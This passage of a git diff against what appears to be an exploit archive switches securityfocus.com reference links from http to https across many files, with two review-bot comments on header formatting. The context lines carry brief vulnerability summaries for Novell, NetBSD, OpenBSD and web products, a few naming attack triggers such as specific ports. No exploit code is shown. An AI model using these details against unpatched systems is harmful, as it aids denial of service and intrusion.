vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34914.txt b/exploits/multiple/webapps/34914.txt index 3b770b3ee..63ff9b756 100644 --- a/exploits/multiple/webapps/34914.txt +++ b/exploits/multiple/webapps/34914.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34915.txt b/exploits/multiple/webapps/34915.txt index b4c779edc..777ae9437 100644 --- a/exploits/multiple/webapps/34915.txt +++ b/exploits/multiple/webapps/34915.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34916.txt b/exploits/multiple/webapps/34916.txt index 1a5f27f3a..53e0cfae9 100644 --- a/exploits/multiple/webapps/34916.txt +++ b/exploits/multiple/webapps/34916.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/34917.txt b/exploits/multiple/webapps/34917.txt index ac5595301..4802f2990 100644 --- a/exploits/multiple/webapps/34917.txt +++ b/exploits/multiple/webapps/34917.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44382/info +source: https://www.securityfocus.com/bid/44382/info IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/35012.txt b/exploits/multiple/webapps/35012.txt index 54fc7360c..6d52f4b1e 100644 --- a/exploits/multiple/webapps/35012.txt +++ b/exploits/multiple/webapps/35012.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45027/info +source: https://www.securityfocus.com/bid/45027/info ZyXEL P-660R-T1 V2 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/webapps/35233.txt b/exploits/multiple/webapps/35233.txt index db157818a..6783525dd 100644 --- a/exploits/multiple/webapps/35233.txt +++ b/exploits/multiple/webapps/35233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45911/info +source: https://www.securityfocus.com/bid/45911/info B-Cumulus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/35743.txt b/exploits/multiple/webapps/35743.txt index 8dab38b03..2f70bf7dc 100644 --- a/exploits/multiple/webapps/35743.txt +++ b/exploits/multiple/webapps/35743.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47845/info +source: https://www.securityfocus.com/bid/47845/info The Flash Tag Cloud widget and the MT-Cumulus Plugin are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/35941.txt b/exploits/multiple/webapps/35941.txt index b001bd41a..b607b982c 100644 --- a/exploits/multiple/webapps/35941.txt +++ b/exploits/multiple/webapps/35941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48651/info +source: https://www.securityfocus.com/bid/48651/info Flowplayer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/multiple/webapps/37470.txt b/exploits/multiple/webapps/37470.txt index d5f9b5375..a4c22cfb4 100644 --- a/exploits/multiple/webapps/37470.txt +++ b/exploits/multiple/webapps/37470.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54245/info +source: https://www.securityfocus.com/bid/54245/info SWFUpload is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/multiple/webapps/37569.txt b/exploits/multiple/webapps/37569.txt index 8db9505ee..dd3784e9a 100644 --- a/exploits/multiple/webapps/37569.txt +++ b/exploits/multiple/webapps/37569.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54792/info +source: https://www.securityfocus.com/bid/54792/info ntop is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/multiple/webapps/37570.py b/exploits/multiple/webapps/37570.py index 74fc6a761..3dce26715 100755 --- a/exploits/multiple/webapps/37570.py +++ b/exploits/multiple/webapps/37570.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54793/info +source: https://www.securityfocus.com/bid/54793/info Zenoss is prone to the following security vulnerabilities: diff --git a/exploits/multiple/webapps/37571.txt b/exploits/multiple/webapps/37571.txt index 663e7f5c2..7c52f7121 100644 --- a/exploits/multiple/webapps/37571.txt +++ b/exploits/multiple/webapps/37571.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54793/info +source: https://www.securityfocus.com/bid/54793/info Zenoss is prone to the following security vulnerabilities: diff --git a/exploits/multiple/webapps/37573.txt b/exploits/multiple/webapps/37573.txt index 2241bc2c6..1eb6dc0d6 100644 --- a/exploits/multiple/webapps/37573.txt +++ b/exploits/multiple/webapps/37573.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54812/info +source: https://www.securityfocus.com/bid/54812/info Worksforweb iAuto is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. 
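Review bot: in the `exploits/multiple/webapps/37570.py` hunk, line 1 of a file with mode 100755 and a `.py` extension is the bare text `source: https://www.securityfocus.com/bid/54793/info`, followed by unquoted prose on the context lines, so the header is not valid Python and any linter or scanner that parses the file fails on the first line. Since this line is being touched anyway, consider moving the header into `#` comments or a docstring, as `28340.c` already does by keeping its `source:` line inside `/* ... */`.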
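Review bot: in the `exploits/multiple/webapps/21082.txt` hunk only the `BID:` line is switched to https, while the `CVE-2011-5028: http://www.cvedetails.com/cve/CVE-2011-5028` reference on the next context line keeps the http scheme, leaving the file with mixed schemes in adjacent reference lines. If the change is deliberately scoped to securityfocus.com links, say so in the commit message; otherwise update the neighbouring reference in the same pass.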
diff --git a/exploits/multiple/webapps/37791.txt b/exploits/multiple/webapps/37791.txt index 8eeaeb379..4051fc76b 100644 --- a/exploits/multiple/webapps/37791.txt +++ b/exploits/multiple/webapps/37791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55509/info +source: https://www.securityfocus.com/bid/55509/info Atlassian Confluence is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/webapps/38016.txt b/exploits/multiple/webapps/38016.txt index 0b863ff2d..a2783da84 100644 --- a/exploits/multiple/webapps/38016.txt +++ b/exploits/multiple/webapps/38016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56474/info +source: https://www.securityfocus.com/bid/56474/info ESRI ArcGIS for Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/multiple/webapps/38062.txt b/exploits/multiple/webapps/38062.txt index 64cd2030a..f8aabfcb2 100644 --- a/exploits/multiple/webapps/38062.txt +++ b/exploits/multiple/webapps/38062.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56687/info +source: https://www.securityfocus.com/bid/56687/info Forescout CounterACT is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/webapps/38366.py b/exploits/multiple/webapps/38366.py index 5eb9d9a1a..6729da1fa 100755 --- a/exploits/multiple/webapps/38366.py +++ b/exploits/multiple/webapps/38366.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58334/info +source: https://www.securityfocus.com/bid/58334/info Verax NMS is prone to multiple security-bypass and information disclosure vulnerabilities. diff --git a/exploits/multiple/webapps/38463.txt b/exploits/multiple/webapps/38463.txt index 28c9dc7ab..62c7520c6 100644 --- a/exploits/multiple/webapps/38463.txt 
+++ b/exploits/multiple/webapps/38463.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59053/info +source: https://www.securityfocus.com/bid/59053/info Aibolit is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/webapps/39288.txt b/exploits/multiple/webapps/39288.txt index e8d498abb..8872708c8 100644 --- a/exploits/multiple/webapps/39288.txt +++ b/exploits/multiple/webapps/39288.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/69303/info +source: https://www.securityfocus.com/bid/69303/info ManageEngine Password Manager Pro and ManageEngine IT360 are prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/multiple/webapps/43438.txt b/exploits/multiple/webapps/43438.txt index 71ef30146..73b27aab0 100644 --- a/exploits/multiple/webapps/43438.txt +++ b/exploits/multiple/webapps/43438.txt @@ -17,8 +17,8 @@ Add Site Script Injection Vulnerability: phpLinks does not sufficiently sanitized HTML and script code supplied via form fields before displaying this data to administrative users. This issue exists in the 'add.php' script, which is used to add sites to the phpLinks system. As a result, an attacker may cause malicious HTML and script code to be executed in the web client of an administrative user who reviews attacker-supplied data submitted when a site is added. Solution: -http://www.securityfocus.com/bid/6632/solution/ -http://www.securityfocus.com/bid/6633/solution/ +https://www.securityfocus.com/bid/6632/solution/ +https://www.securityfocus.com/bid/6633/solution/ Proof Of Conecpt Exploit: phpLinks Arbitrary Command Proof Of Concept diff --git a/exploits/netbsd_x86/dos/29204.pl b/exploits/netbsd_x86/dos/29204.pl index b79474edc..68d37b291 100755 --- a/exploits/netbsd_x86/dos/29204.pl +++ b/exploits/netbsd_x86/dos/29204.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21377/info +source: https://www.securityfocus.com/bid/21377/info NetBSD ftpd and tnftpd are prone to a remote buffer-overflow vulnerability. This issue is due to an off-by-one error; it allows attackers to corrupt memory. diff --git a/exploits/netbsd_x86/local/19261.txt b/exploits/netbsd_x86/local/19261.txt index 348f0eb15..eed993604 100644 --- a/exploits/netbsd_x86/local/19261.txt +++ b/exploits/netbsd_x86/local/19261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/331/info +source: https://www.securityfocus.com/bid/331/info A vulnerability exists in NetBSD version 1.3.2 and lower, and Silicon Graphics Inc's IRIX versions 6.2, 6.3, 6.4, 6.5 and 6.5.1. The at(1) program can be supplied with a -f flag, and an error is access validation can result in the mailing of portions of unreadable files to any user who can run at. diff --git a/exploits/netbsd_x86/remote/21364.txt b/exploits/netbsd_x86/remote/21364.txt index dcadd102a..50f702776 100644 --- a/exploits/netbsd_x86/remote/21364.txt +++ b/exploits/netbsd_x86/remote/21364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4419/info +source: https://www.securityfocus.com/bid/4419/info talkd is a client-server application shipped with many Unix and Linux variants that is used for communication between users locally or remotely. diff --git a/exploits/netware/dos/19854.sh b/exploits/netware/dos/19854.sh index 61d0476b9..a25fa8c63 100755 --- a/exploits/netware/dos/19854.sh +++ b/exploits/netware/dos/19854.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1118/info +source: https://www.securityfocus.com/bid/1118/info The Netware Remote Administration utility can be compromised to allow arbitrary code to be remotely run on the server. diff --git a/exploits/netware/dos/22949.txt b/exploits/netware/dos/22949.txt index d0cd874b8..9c2646346 100644 --- a/exploits/netware/dos/22949.txt +++ b/exploits/netware/dos/22949.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8251/info +source: https://www.securityfocus.com/bid/8251/info Novell Netware Enterprise Web Server cgi2perl.nlm has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/netware/remote/19364.txt b/exploits/netware/remote/19364.txt index 8b761411f..2f537270e 100644 --- a/exploits/netware/remote/19364.txt +++ b/exploits/netware/remote/19364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/482/info +source: https://www.securityfocus.com/bid/482/info The encrypted passwords for Remote.NLM are remotely accessible to anyone with the ability to view SYS:System\LDRemote.NCF. The password encryption algorithm for Remote.NLM has been broken and can be decrypted with pencil and paper. diff --git a/exploits/netware/remote/19365.txt b/exploits/netware/remote/19365.txt index 54f13970c..5c92fd759 100644 --- a/exploits/netware/remote/19365.txt +++ b/exploits/netware/remote/19365.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/484/info +source: https://www.securityfocus.com/bid/484/info Non-authenticated clients have access to CX.EXE and NLIST.EXE in the SYS:LOGIN directory of a Netware 4.x server. The default root access is set to Read. Therefore, by using various switch options in CX.EXE and NLIST.EXE, anyone connecting to the server can gain access to NDS tree information such as account names, group names and membership, tree layout etc. By attaching to different servers and switching contexts an intruder could gain an understanding of the NDS structure for the entire network. diff --git a/exploits/netware/remote/23586.txt b/exploits/netware/remote/23586.txt index 64716c643..e2f04758a 100644 --- a/exploits/netware/remote/23586.txt +++ b/exploits/netware/remote/23586.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9479/info +source: https://www.securityfocus.com/bid/9479/info Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server. diff --git a/exploits/netware/remote/23587.txt b/exploits/netware/remote/23587.txt index c145beba8..af70fd025 100644 --- a/exploits/netware/remote/23587.txt +++ b/exploits/netware/remote/23587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9479/info +source: https://www.securityfocus.com/bid/9479/info Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server. diff --git a/exploits/netware/remote/23588.txt b/exploits/netware/remote/23588.txt index 5c63c5964..45b1e18da 100644 --- a/exploits/netware/remote/23588.txt +++ b/exploits/netware/remote/23588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9479/info +source: https://www.securityfocus.com/bid/9479/info Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server. diff --git a/exploits/netware/remote/23589.txt b/exploits/netware/remote/23589.txt index 2916bc3b9..f9e1b5f15 100644 --- a/exploits/netware/remote/23589.txt +++ b/exploits/netware/remote/23589.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9479/info +source: https://www.securityfocus.com/bid/9479/info Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server. diff --git a/exploits/novell/dos/19541.txt b/exploits/novell/dos/19541.txt index 7abc338c2..26dae73f8 100644 --- a/exploits/novell/dos/19541.txt +++ b/exploits/novell/dos/19541.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/700/info +source: https://www.securityfocus.com/bid/700/info Novell client versions 3.0 and 3.01 for Windows platforms are vulnerable to a remotely exploitable vulnerability which could cause a denial of service. The client opens a listening tcp socket on port 427, to which if a SYN is sent, results in the machine locking with a "blue screen" error. The only solution from that point is to reset the affected computer. diff --git a/exploits/novell/dos/19744.txt b/exploits/novell/dos/19744.txt index c9fdc7101..fccbf2f30 100644 --- a/exploits/novell/dos/19744.txt +++ b/exploits/novell/dos/19744.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/972/info +source: https://www.securityfocus.com/bid/972/info By requesting a long URL from a Novell Groupwise 5.5 webserver with the Enhancement Pack installed, it is possible to cause the server to abend, the Java.nlm to take up all available CPU resource, or to stop the post office service. The server will need to be rebooted to restore normal operation. diff --git a/exploits/novell/dos/19746.txt b/exploits/novell/dos/19746.txt index 8ad94409d..72c2e463a 100644 --- a/exploits/novell/dos/19746.txt +++ b/exploits/novell/dos/19746.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/976/info +source: https://www.securityfocus.com/bid/976/info A feature called the CS Audit Trail Proxy is installed by default with BorederManager 3.0 and 3.5 .This feature opens a listening port at port 2000, on both the internal and external interfaces. If a connection is made to this port and the 'enter' key hit a few times, the server will start experincing memory allocation problems. Eventually the server will have to be rebooted to restore normal functionality. diff --git a/exploits/novell/dos/20072.txt b/exploits/novell/dos/20072.txt index 248801321..76f17ba40 100644 --- a/exploits/novell/dos/20072.txt +++ b/exploits/novell/dos/20072.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1467/info +source: https://www.securityfocus.com/bid/1467/info When Novell Netware is configured with IPX-Compatibility enabled, it is vulnerable to a denial of service attack by sending packets with random data to port 40193. Similar results are possible by sending fragmented packets. This has been observed on Novell Netware 5.0 service pack 5, other versions may be vulnerable. diff --git a/exploits/novell/dos/22749.txt b/exploits/novell/dos/22749.txt index 4e2deff9f..60184ad4f 100644 --- a/exploits/novell/dos/22749.txt +++ b/exploits/novell/dos/22749.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7841/info +source: https://www.securityfocus.com/bid/7841/info It has been reported that the HTTP Stack distributed with Novell Netware and eDirectory does not properly handle some types of malformed packets. Because of this, an attacker may be able to cause a denial of service to legitimate users of the HTTP service. diff --git a/exploits/novell/dos/31710.txt b/exploits/novell/dos/31710.txt index d23d2e2df..66d7e29fa 100644 --- a/exploits/novell/dos/31710.txt +++ b/exploits/novell/dos/31710.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28944/info +source: https://www.securityfocus.com/bid/28944/info Novell GroupWise is prone to an HTML-injection vulnerability and a denial-of-service vulnerability. diff --git a/exploits/novell/dos/31889.pl b/exploits/novell/dos/31889.pl index 71757dbe6..fb3390527 100755 --- a/exploits/novell/dos/31889.pl +++ b/exploits/novell/dos/31889.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29602/info +source: https://www.securityfocus.com/bid/29602/info Novell GroupWise Messenger is prone to two buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized buffer. diff --git a/exploits/novell/dos/32951.py b/exploits/novell/dos/32951.py index 09a873baf..4c58383b5 100755 --- a/exploits/novell/dos/32951.py +++ b/exploits/novell/dos/32951.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34693/info +source: https://www.securityfocus.com/bid/34693/info Recover Data for Novell Netware is prone to a remote denial-of-service vulnerability. diff --git a/exploits/novell/dos/33183.html b/exploits/novell/dos/33183.html index 584263490..5365acddb 100644 --- a/exploits/novell/dos/33183.html +++ b/exploits/novell/dos/33183.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36139/info +source: https://www.securityfocus.com/bid/36139/info The Novell Client ActiveX control is prone to a remote denial-of-service vulnerability because of an unspecified error. diff --git a/exploits/novell/dos/33184.html b/exploits/novell/dos/33184.html index 551f8c74a..90148c1f9 100644 --- a/exploits/novell/dos/33184.html +++ b/exploits/novell/dos/33184.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36139/info +source: https://www.securityfocus.com/bid/36139/info The Novell Client ActiveX control is prone to a remote denial-of-service vulnerability because of an unspecified error. 
diff --git a/exploits/novell/dos/34980.py b/exploits/novell/dos/34980.py index 5a35a8830..247859b43 100755 --- a/exploits/novell/dos/34980.py +++ b/exploits/novell/dos/34980.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44732/info +source: https://www.securityfocus.com/bid/44732/info Novell GroupWise is prone to multiple security vulnerabilities, including multiple remote code-execution vulnerabilities, an information-disclosure issue, and a cross-site scripting issue. diff --git a/exploits/novell/local/28427.pl b/exploits/novell/local/28427.pl index 480853124..7b65bfa51 100755 --- a/exploits/novell/local/28427.pl +++ b/exploits/novell/local/28427.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19688/info +source: https://www.securityfocus.com/bid/19688/info Novell Identity Manager is prone to an arbitrary command-execution vulnerability. diff --git a/exploits/novell/remote/19682.txt b/exploits/novell/remote/19682.txt index 1a9a419d9..98c4ef545 100644 --- a/exploits/novell/remote/19682.txt +++ b/exploits/novell/remote/19682.txt @@ -1,6 +1,6 @@ Netscape Enterprise Server for NetWare 4/5 3.0.7 a,Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities -source: http://www.securityfocus.com/bid/879/info +source: https://www.securityfocus.com/bid/879/info The HELP function in GWWEB.EXE will reveal the path of the server, and combined with the '../' string, allow read access for any client to any .htm file on the server, as well as browseable directory listings. diff --git a/exploits/novell/remote/20482.txt b/exploits/novell/remote/20482.txt index 9c58221a9..1a100cb58 100644 --- a/exploits/novell/remote/20482.txt +++ b/exploits/novell/remote/20482.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2076/info +source: https://www.securityfocus.com/bid/2076/info Novell Web Server 3.x Examples Toolkit v.2 is a package containing example scripts and HTML files to help administrators design web sites. It is not a support Novell product and is provided solely as a convenience to the user. The toolkit contained a script called "FILES.PL" that could be used to view the contents of files or directories on the server by a remote attacker. This is done by passing the parameter "file=" to the script. An attacker could gain information useful in conducting subsequent attacks, or retrieve personal or proprietary information. diff --git a/exploits/novell/remote/21182.txt b/exploits/novell/remote/21182.txt index 1cd3f1a85..fbd56b214 100644 --- a/exploits/novell/remote/21182.txt +++ b/exploits/novell/remote/21182.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3697/info +source: https://www.securityfocus.com/bid/3697/info Novell Groupwise Servlet Gateway is a product that allows Java servlets to be run with NetWare, using Novell JVM for NetWare v1.1.7b and NetWare Enterprise Web Server. diff --git a/exploits/novell/remote/21488.txt b/exploits/novell/remote/21488.txt index a3d5fb234..d9cd2eab7 100644 --- a/exploits/novell/remote/21488.txt +++ b/exploits/novell/remote/21488.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4874/info +source: https://www.securityfocus.com/bid/4874/info It has been reported that Netscape Enterprise Web Server may disclose path and system information to a remote user. diff --git a/exploits/novell/remote/21731.pl b/exploits/novell/remote/21731.pl index ef37e7ef3..9c708e385 100755 --- a/exploits/novell/remote/21731.pl +++ b/exploits/novell/remote/21731.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5520/info +source: https://www.securityfocus.com/bid/5520/info A vulnerability has been reported in some versions of Novell NetWare. This issue lies in the handling of some HTTP requests when Perl is used as a handler by a web server. diff --git a/exploits/novell/remote/28835.pl b/exploits/novell/remote/28835.pl index a10b872e1..9b43b3bc2 100755 --- a/exploits/novell/remote/28835.pl +++ b/exploits/novell/remote/28835.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20655/info +source: https://www.securityfocus.com/bid/20655/info The Novell eDirectory server iMonitor is prone to a stack-based buffer-overflow vulnerability because it fails to perform sufficient bounds checking on client-supplied data before copying it to a buffer. diff --git a/exploits/novell/remote/28836.c b/exploits/novell/remote/28836.c index 664c84078..ffffcd674 100644 --- a/exploits/novell/remote/28836.c +++ b/exploits/novell/remote/28836.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20655/info +// source: https://www.securityfocus.com/bid/20655/info The Novell eDirectory server iMonitor is prone to a stack-based buffer-overflow vulnerability because it fails to perform sufficient bounds checking on client-supplied data before copying it to a buffer. diff --git a/exploits/novell/remote/28837.rb b/exploits/novell/remote/28837.rb index e7dff3894..f65fe8bfd 100755 --- a/exploits/novell/remote/28837.rb +++ b/exploits/novell/remote/28837.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20655/info +source: https://www.securityfocus.com/bid/20655/info The Novell eDirectory server iMonitor is prone to a stack-based buffer-overflow vulnerability because it fails to perform sufficient bounds checking on client-supplied data before copying it to a buffer. diff --git a/exploits/novell/remote/29400.txt b/exploits/novell/remote/29400.txt index 9f408cda2..a0869ebb3 100644 --- a/exploits/novell/remote/29400.txt 
+++ b/exploits/novell/remote/29400.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21921/info +source: https://www.securityfocus.com/bid/21921/info Access Manager Identity Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/novell/remote/29699.txt b/exploits/novell/remote/29699.txt index 92549ec4c..253dd48aa 100644 --- a/exploits/novell/remote/29699.txt +++ b/exploits/novell/remote/29699.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22787/info +source: https://www.securityfocus.com/bid/22787/info Novell Access Management SSLVPN Server is prone to a security-bypass vulnerability. diff --git a/exploits/novell/remote/30432.txt b/exploits/novell/remote/30432.txt index 46516d0ed..786286fe8 100644 --- a/exploits/novell/remote/30432.txt +++ b/exploits/novell/remote/30432.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25126/info +source: https://www.securityfocus.com/bid/25126/info Novell GroupWise WebAccess is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/novell/remote/31095.txt b/exploits/novell/remote/31095.txt index c8b8a16b6..49e846842 100644 --- a/exploits/novell/remote/31095.txt +++ b/exploits/novell/remote/31095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27582/info +source: https://www.securityfocus.com/bid/27582/info Novell GroupWise WebAccess is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/novell/remote/31533.txt b/exploits/novell/remote/31533.txt index 137fb7b78..e46b94351 100644 --- a/exploits/novell/remote/31533.txt +++ b/exploits/novell/remote/31533.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28441/info +source: https://www.securityfocus.com/bid/28441/info Novell eDirectory is prone to an unspecified vulnerability that can result in unauthorized file access or a denial of service. diff --git a/exploits/novell/remote/32795.txt b/exploits/novell/remote/32795.txt index 9f8305b02..17cfdeca5 100644 --- a/exploits/novell/remote/32795.txt +++ b/exploits/novell/remote/32795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33708/info +source: https://www.securityfocus.com/bid/33708/info Novell QuickFinder Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/novell/remote/32876.txt b/exploits/novell/remote/32876.txt index 3e58add15..cbfe7498b 100644 --- a/exploits/novell/remote/32876.txt +++ b/exploits/novell/remote/32876.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34267/info +source: https://www.securityfocus.com/bid/34267/info Novell NetStorage is prone to the following remote vulnerabilities: diff --git a/exploits/novell/remote/33351.pl b/exploits/novell/remote/33351.pl index 1db6b26b1..0a5a72951 100755 --- a/exploits/novell/remote/33351.pl +++ b/exploits/novell/remote/33351.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37009/info +source: https://www.securityfocus.com/bid/37009/info Novell eDirectory is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/novell/remote/33767.rb b/exploits/novell/remote/33767.rb index 81d20c855..8a3ba5111 100755 --- a/exploits/novell/remote/33767.rb +++ b/exploits/novell/remote/33767.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38782/info +source: https://www.securityfocus.com/bid/38782/info Novell eDirectory is prone to a session-hijacking vulnerability. 
diff --git a/exploits/openbsd/dos/20271.c b/exploits/openbsd/dos/20271.c index 06e610cf7..f7e56f582 100644 --- a/exploits/openbsd/dos/20271.c +++ b/exploits/openbsd/dos/20271.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1759/info +// source: https://www.securityfocus.com/bid/1759/info OpenBSD is vulnerable to a remotely exploitable denial of service condition. The problem seems to be a lack of limits on the storage of pending arp requests, and a failure to handle the condition of too many. If an attacker somehow causes a victim machine to send out too many arp requests, it can cause a kernel panic and the target system to halt. diff --git a/exploits/openbsd/dos/21167.c b/exploits/openbsd/dos/21167.c index 1daf8b650..ed7a6eced 100644 --- a/exploits/openbsd/dos/21167.c +++ b/exploits/openbsd/dos/21167.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3612/info +// source: https://www.securityfocus.com/bid/3612/info OpenBSD is a freely available implementation of the BSD Operating System. It is based on the NetBSD implementation. diff --git a/exploits/openbsd/dos/23339.c b/exploits/openbsd/dos/23339.c index e07803ca9..a560a4960 100644 --- a/exploits/openbsd/dos/23339.c +++ b/exploits/openbsd/dos/23339.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8978/info +// source: https://www.securityfocus.com/bid/8978/info The OpenBSD team has fixed a vulnerability in the OpenBSD kernel when handling certain executables. It appears that the problem lies in the lack of specific sanity checks on binary header values. As a result, a user who constructs a malformed binary and subsequently executes it may trigger a kernel panic. diff --git a/exploits/openbsd/dos/23389.c b/exploits/openbsd/dos/23389.c index eaa8e2632..c5c3269c9 100644 --- a/exploits/openbsd/dos/23389.c +++ b/exploits/openbsd/dos/23389.c 
